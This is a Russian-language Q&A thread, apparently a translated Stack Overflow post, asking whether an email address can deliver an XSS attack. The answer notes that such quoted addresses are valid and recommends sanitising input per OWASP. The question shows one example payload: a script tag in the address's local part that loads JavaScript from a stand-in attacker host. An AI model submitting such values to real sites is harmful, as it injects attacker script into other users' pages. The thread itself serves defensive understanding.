Возможны ли атаки XSS через адреса электронной почты?

Question

Возможны ли атаки XSS через адреса электронной почты?

Интересно, можно ли использовать адрес электронной почты для XSS-атак?

Предположим, есть веб-сайт, на котором можно зарегистрироваться и указать свой адрес электронной почты. Если кто-то хочет атаковать данный веб-сайт, он или она может создать адрес электронной почты, такой как этот:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

а затем использовать этот адрес электронной почты для атаки на сайт.

Разрешено ли указывать цитату или скрипт в адресе электронной почты?

8

email security xss email-formats

Источник

user436560 05 июл '13 в 03:53

1 ответ

Решение

Другие вопросы по тегам email security xss email-formats

user2235132 05 июл '13 в 04:24 2013-07-05 04:24 · Accepted Answer · 2013-07-05 04:24

Адрес электронной почты в вашем примере кажется действительным. Единственный необычный персонаж - это цитата " - остальные действительны.

Википедия предполагает, что указанный вами адрес электронной почты действителен.

Вы должны убедиться, что произвольный пользовательский ввод очищен перед обработкой.

Для начала вы можете обратиться к информации о XSS и профилактике, доступной в OWASP.